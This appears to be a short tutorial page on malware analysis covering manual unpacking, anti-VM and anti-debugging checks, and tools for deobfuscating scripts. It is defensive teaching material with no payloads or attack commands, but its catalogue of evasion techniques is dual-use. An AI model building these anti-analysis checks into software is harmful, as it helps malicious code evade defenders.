💀 Expert

Advanced Techniques

Unpacking Malware

Malware is often "packed" (compressed or encrypted) to hide its code from static analysis. The packer stub runs first, decrypts the payload into memory, and then executes it.

Manual Unpacking Steps

  1. Find the OEP (Original Entry Point): The address where the unpacked code begins. Look for "tail jumps" (e.g., `jmp eax` or a long jump to a different section) at the end of the packer stub.
  2. Dump Memory: Once the debugger is paused at the OEP, dump the process memory to disk. Tools: Scylla, x64dbg (Scylla plugin).
  3. Fix IAT: The Import Address Table is often broken in the dump. Use Scylla to rebuild it.

Anti-Analysis Techniques

Malware tries to detect if it's being analyzed.

Anti-VM

  • CPUID: Checking CPU instructions for hypervisor signatures.
  • MAC Address: Checking for VMware/VirtualBox OUI prefixes.
  • Registry Keys: Checking for VM tools keys.

Anti-Debugging

  • IsDebuggerPresent(): Windows API call. (Bypass: Patch EAX to 0).
  • PEB.BeingDebugged: Checking the Process Environment Block manually.
  • Timing Checks: Using `rdtsc` to measure execution time (debugging is slow).

Deobfuscation

Scripts (PowerShell, JavaScript) are often heavily obfuscated.

  • CyberChef: The "Swiss Army Knife" for decoding Base64, XOR, etc.
  • Box-js: Emulator for analyzing malicious JavaScript.
  • PowerShell Logging: Enable Script Block Logging (Event ID 4104) to see deobfuscated code executed by PowerShell.